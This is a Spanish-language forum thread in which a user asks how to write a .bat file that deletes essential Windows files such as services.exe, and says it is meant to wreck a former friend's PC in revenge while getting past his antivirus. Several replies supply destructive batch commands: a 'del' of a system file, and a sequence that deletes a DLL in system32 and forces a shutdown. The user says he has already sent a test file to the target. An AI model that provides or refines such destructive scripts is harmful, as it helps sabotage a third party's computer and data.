[fichero].bat

como puedo crear un *.bat que borre un archivo que inicia el windows???

Me refiero a lo que hay que escribir en un archivo de texto [txt] para luego cambiarle la extension a bat
pero que quieres hacerlo en un note pak? nos eria mejor hacerlo en ms-2?
sino mal rekuerdo de mis tiempos de mdos q son los komandos t metes nel txt antes de kambiarlo seria algo komo

del c:\archivo.exe

t akonsejo probarlo antes xD
eso si komo no le kambies el .txt a .bat no va ni patras
es el virus mas inozente de todos xP

puedes poner kualkier komando de mdos, vamos q funzionan el dm pa krear karpetas x ejemplo etc, etc, etc.
Ante todos buenas tardes.

Si mal no me acuerdo seria algo asi como:

echo -s
cd..
cd..
cd windows/system32/
del hall.dll
shutdown -s -t 2

Mas o menos era asi, mas no me acuerdo demasiado bien; eso si, tu sabras para lo que lo quieres.
quiero coger el bloc de notas escribir lo necesario para borrar un archvo nesesario del windows y depues cambiar la estensio txt a bat. Como pongo un comando para borrar el "services.exe"???
airam1809 escribió:[...]Como pongo un comando para borrar el "services.exe"???

ein? y porque alguien querria borrar ESE archivo? te ha insultado o algo?

oye, si consigues borrarlo, haznoslo saber. no se, quizas en otro post del tipo
'ejecute un .bat y ahora windows no se inicia. me da una pantalla azul que dice no se que de servicios ausentes'

estare esperando... un saludo...
la razon de querer borar ese archivo es por que se que lo necesita el windows para funcionar y se lo jodido que es ver reiniciarse el pc cada vez que inicias sesion.

Lo que quiero es mandar el bat a un gilipollas que hace como un mes me mando un virus que se cargo mi grafica.
Terminas antes con un hacha...

Y me intriga lo de la VGA, la verdad. :cool:
La verdad es que hay metodos mejores para devolverle la jugada que un simple *.bat algo tambien simple, con algo de codigo visual puedes hacer cosas divertidas conbinadas con el reloj del PC. Aunque no se si eso compensara tu tarjeta grafica la verdad.
la cosa es que kiero putearle pero el tio es listo y siempre revisa con varioas antivirus todo lo ke le llega, pero claro si te llega un bat que borra algo gordo y la "lia" ¿¿¿ke antivirus te avisa de un bat???

solo kiero devolverle la jugada y la unica manera que veo es meterle el bat.

PD: Ya que se interesan les cuento la historia:

hace tiempo me llevaba bien con el tipo ,hablabamos mucho, se puede decir que eramos colegas. El cambio de instituto y me lleve un tiempo sin verlo, pero no peleamos ni nada. Hace unos meses lo veo conectado al msn y me dice "mira esto" doy click y automaticamente me sale una pantalla azul de que windows se apaga para evitar daños. Desde ese momento el pc no volvio a funcionar con esa targeta grafica... Laq grafica tampoco me importa muxo por tengo dos pc´s un pentium4 a 3400 que es el que yo uso y un intercelerom a 600 que arregle hace poco... pues la grafica del celerom es la que se cargi el hijoputa.

Edito: Ahora mismo se ha conectado y le he mandado un bat vacio. Resulta que no hay manera de que acepte...
9 respuestas